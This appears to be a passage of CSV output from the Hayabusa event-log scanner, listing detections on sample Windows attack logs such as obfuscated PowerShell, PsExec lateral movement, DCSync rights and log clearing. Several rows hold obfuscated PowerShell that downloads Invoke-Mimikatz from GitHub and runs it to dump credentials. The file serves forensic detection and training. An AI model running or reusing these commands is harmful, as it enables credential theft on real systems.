+${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${-#}${*} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/}+ ${*[%}${]!}${-#}${%}+ ${*[%}${]!}${]!}${]!} +${*[%}${]!}${]!}${-#} +${*[%}${+=}${#/}+ ${*[%}${@=-}${-#}+${*[%}${]!}${]!}${]!} + ${*[%}${]!}${]!}${@%)} +${*[%}${]!}${-#}${]!} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@=-}${(@}+ ${*[%}${]!}${]!}${*}+${*[%}${]!}${-#}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${.]/}+${*[%}${+=}${#/} + ${*[%}${]!}${-#}${@%)}+ ${*[%}${@%)}${#/} +${*[%}${]!}${]!}${%} +${*[%}${]!}${]!}${.]/}+${*[%}${]!}${-#}${]!} +${*[%}${]!}${]!}${+=} +${*[%}${+=}${#/}+${*[%}${.]/}${@%)}+${*[%}${]!}${*}${-#} +${*[%}${]!}${-#}${*}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@=-} +${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${]!}${+=}+ ${*[%}${@%)}${#/}+ ${*[%}${]!}${]!}${.]/} + ${*[%}${]!}${-#}${%} + ${*[%}${]!}${]!}${]!}+${*[%}${]!}${]!}${-#}+${*[%}${+=}${#/}+${*[%}${#/}${(@}+ ${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+${*[%}${]!}${]!}${]!}+${*[%}${]!}${-#}${#/} +${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/}+ ${*[%}${]!}${-#}${%}+${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${#/}+${*[%}${@%)}${#/} + ${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*} + ${*[%}${+=}${.]/} + ${*[%}${]!}${]!}${*}+${*[%}${]!}${]!}${%} + ${*[%}${+=}${@%)}+ ${*[%}${(@}${@%)} + ${*[%}${+=}${]!} +${*[%}${%}${@%)} +${*[%}${(@}${*}+ ${*[%}${#/}${(@}+${*[%}${]!}${]!}${-#}+${*[%}${]!}${]!}${@=-}+ ${*[%}${]!}${]!}${]!}+ ${*[%}${]!}${-#}${#/}+${*[%}${]!}${-#}${]!}+${*[%}${+=}${%}+ ${*[%}${#/}${#/} + ${*[%}${]!}${-#}${%} +${*[%}${]!}${-#}${@%)}+${*[%}${]!}${-#}${%}+ ${*[%}${]!}${-#}${#/} + ${*[%}${@%)}${#/}+${*[%}${]!}${]!}${.]/}+${*[%}${]!}${*}${*}+${*[%}${(@}${*} + ${*[%}${+=}${%} +${*[%}${.]/}${@=-}+${*[%}${]!}${]!}${#/} +${*[%}${]!}${-#}${@%)}+ ${*[%}${]!}${]!}${*} +${*[%}${.]/}${#/}+${*[%}${]!}${]!}${+=} +${*[%}${]!}${-#}${]!}+${*[%}${]!}${-#}${-#} + ${*[%}${]!}${]!}${%})""|& ${=}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:06.938 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,iex([CHar]73 +[CHar]69+[CHar]88 +[CHar]32 +[CHar]40 +[CHar]78 +[CHar]101+[CHar]119 + [CHar]45+ [CHar]79 + [CHar]98+[CHar]106+[CHar]101 +[CHar]99 +[CHar]116+ [CHar]32 +[CHar]78+[CHar]101 + [CHar]116 +[CHar]46+[CHar]87+[CHar]101 + [CHar]98+ [CHar]67 +[CHar]108 +[CHar]105+[CHar]101 + [CHar]110 + [CHar]116+ [CHar]41 + [CHar]46+ [CHar]68+ [CHar]111+ [CHar]119+ [CHar]110+[CHar]108 +[CHar]111+ [CHar]97 + [CHar]100 + [CHar]83+ [CHar]116 + [CHar]114+[CHar]105 +[CHar]110+ [CHar]103+ [CHar]40+ [CHar]39+[CHar]104 +[CHar]116 +[CHar]116+ [CHar]112 +[CHar]115 + [CHar]58+ [CHar]47+[CHar]47+[CHar]114+ [CHar]97+ [CHar]119 + [CHar]46+[CHar]103+[CHar]105+ [CHar]116 +[CHar]104 +[CHar]117+[CHar]98+[CHar]117+[CHar]115 + [CHar]101+ [CHar]114 +[CHar]99+ [CHar]111 + [CHar]110+[CHar]116 + [CHar]101 + [CHar]110+ [CHar]116 +[CHar]46+ [CHar]99 +[CHar]111 +[CHar]109 +[CHar]47 + [CHar]109 +[CHar]97 +[CHar]116 +[CHar]116 + [CHar]105 + [CHar]102 +[CHar]101 + [CHar]115 + [CHar]116+[CHar]97+ [CHar]116+ [CHar]105+ [CHar]111 +[CHar]110 +[CHar]47+ [CHar]80+[CHar]111 + [CHar]119 +[CHar]101 + [CHar]114+ [CHar]83+ [CHar]112+[CHar]108+ [CHar]111+ [CHar]105 + [CHar]116+[CHar]47 + [CHar]109+ [CHar]97 +[CHar]115 +[CHar]116+[CHar]101 +[CHar]114 +[CHar]47+[CHar]69+[CHar]120 +[CHar]102+ [CHar]105+[CHar]108 +[CHar]116 + [CHar]114+ [CHar]97+ [CHar]116 + [CHar]105 + [CHar]111+[CHar]110+[CHar]47+[CHar]73+ [CHar]110+[CHar]118+[CHar]111+[CHar]107 +[CHar]101+[CHar]45+ [CHar]77+ [CHar]105+[CHar]109+[CHar]105 +[CHar]107+[CHar]97 + [CHar]116+[CHar]122 + [CHar]46 + [CHar]112+[CHar]115 + [CHar]49+ [CHar]39 + [CHar]41 +[CHar]59 +[CHar]32+ [CHar]73+[CHar]110+[CHar]118+ [CHar]111+ [CHar]107+[CHar]101+[CHar]45+ [CHar]77 + [CHar]105 +[CHar]109+[CHar]105+ [CHar]107 + [CHar]97+[CHar]116+[CHar]122+[CHar]32 + [CHar]45 +[CHar]68+[CHar]117 +[CHar]109+ [CHar]112 +[CHar]67+[CHar]114 +[CHar]101+[CHar]100 + [CHar]115),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.040 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.050 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.054 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.057 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.060 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.062 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.067 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.077 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.081 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.085 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.089 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.107 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.118 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.272 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.286 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:21.338 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:25.959 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"' '| FOrEAcH-ObJect { $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . ( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:25.959 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ $vFzAY=$_ -spLIT ' '|FOrEAcH-ObJect {' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } };((-JoIN($vFzAY[0..($vFzAY.lENGTh-1)])).trim(' ').sPliT( ' ')| FOrEAcH-ObJect { ([Char][iNT]$_)}) -JoIN'' | . ( ''.InDexof.TOStrING()[106,482,184]-jOin'')}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:25.960 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{' '; $_.sPliT(' ')|FOrEAcH-ObJect{ $_.lENGTh- 1 } },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:25.963 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ $_.lENGTh- 1 },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:16:26.128 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ ([Char][iNT]$_)},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:25:04.174 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('IEX ('+'New'+'-Object'+' Net.Web'+'Client'+')'+'.DownloadString(oH'+'4http'+'s:'+'//raw'+'.g'+'it'+'hubuse'+'rcontent.c'+'om/m'+'at'+'tifes'+'t'+'a'+'tion/'+'Po'+'we'+'rSploit/ma'+'s'+'ter/Exfiltra'+'tion'+'/I'+'nvoke-Mimikat'+'z.ps1oH4'+'); Invoke-Mimi'+'katz -Du'+'mpCred'+'s') -REpLacE ([cHaR]111+[cHaR]72+[cHaR]52),[cHaR]39)| IEx",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx 2017-08-31 04:25:20.783 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(((""{41}{32}{44}{45}{20}{36}{35}{21}{10}{40}{29}{42}{26}{28}{1}{19}{15}{11}{48}{49}{39}{30}{4}{18}{47}{31}{24}{23}{33}{43}{12}{13}{7}{8}{22}{46}{14}{27}{25}{5}{0}{34}{6}{16}{17}{38}{3}{9}{2}{37}"" -f'1','ubuserco','Dump','tz ','festati','atz.ps','); In','s','t','-','p','m/','/','ma','ion/I','co','vok','e-M','on','ntent.','load','t','er','l','p','e-Mimik','.','nvok','gith',':','ti','rS',' (New-','o','{0}','t','String({0}h','Creds','imika','t','s','IEX','//raw','it','Object Net.WebCli','ent).Down','/Exfiltrat','/Powe','m','a')) -F [ChaR]39) | . ( $ShelliD[1]+$sHELliD[13]+'X')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx 2017-08-31 04:25:48.631 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$l7i= "" ))93]RaHc[ f- )'sderCpmuD-'+' ztak'+'imi'+'M'+'-e'+'kovnI'+' '+';)}0{'+'1sp.'+'ztaki'+'mi'+'M-ekovnI/no'+'i'+'ta'+'rtl'+'ifx'+'E/'+'retsa'+'m/'+'tiolpSrewoP'+'/no'+'itats'+'e'+'fitt'+'am'+'/moc'+'.tne'+'tn'+'o'+'cresu'+'buhtig'+'.war//:sptth}0{(gn'+'ir'+'tSdaol'+'n'+'woD.)'+'tne'+'ilCb'+'eW.t'+'eN t'+'c'+'ejbO-w'+'eN('+' X'+'EI'(( ( )'x'+]03[emoHSP$+]12[EmOHsp$ ( & ""; ( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE[-1 ..-(( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE.lengTh)]-JOIN''|& ( ([StRiNg]$VERbOsePREferENCe)[1,3]+'X'-join'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx 2017-08-31 04:25:48.647 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,& ( $psHOmE[21]+$PSHome[30]+'x') ( (('IE'+'X '+'(Ne'+'w-Obje'+'c'+'t Ne'+'t.We'+'bCli'+'ent'+').Dow'+'n'+'loadSt'+'ri'+'ng({0}https://raw.'+'github'+'userc'+'o'+'nt'+'ent.'+'com/'+'ma'+'ttif'+'e'+'stati'+'on/'+'PowerSploit'+'/m'+'aster'+'/E'+'xfi'+'ltr'+'at'+'i'+'on/Invoke-M'+'im'+'ikatz'+'.ps1'+'{0});'+' '+'Invok'+'e-'+'M'+'imi'+'katz '+'-DumpCreds') -f [cHaR]39)),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx 2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx 2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx 2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx 2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: helpdesk | Computer: evil.internal.corp | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx 2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: EXCHANGE$ | Computer: EXCHANGE | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx 2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,info,,Logon Type 3 - Network,User: EXCHANGE$ | Computer: EXCHANGE | IP Addr: 192.168.111.87 | LID: 0x24daa6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx 2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx 2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx 2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx 2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx 2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,,Logon Type 5 - Service,User: sshd_server | Computer: PC02 | IP Addr: - | LID: 0xe509,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx 2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x21f73 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx 2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x45120 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx 2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,LatMov,RDP Login from Localhost,,../hayabusa-rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx 2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x4a26d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx 2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x73d02,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx 2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x7d4f4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx 2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: admin01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,info,,Logon Type 11 - CachedInteractive,User: user01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x1414c8 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx 2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,info,,Logon Type 7 - Unlock,User: user01 | Computer: PC01 | IP Addr: - | LID: 0x1414d9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 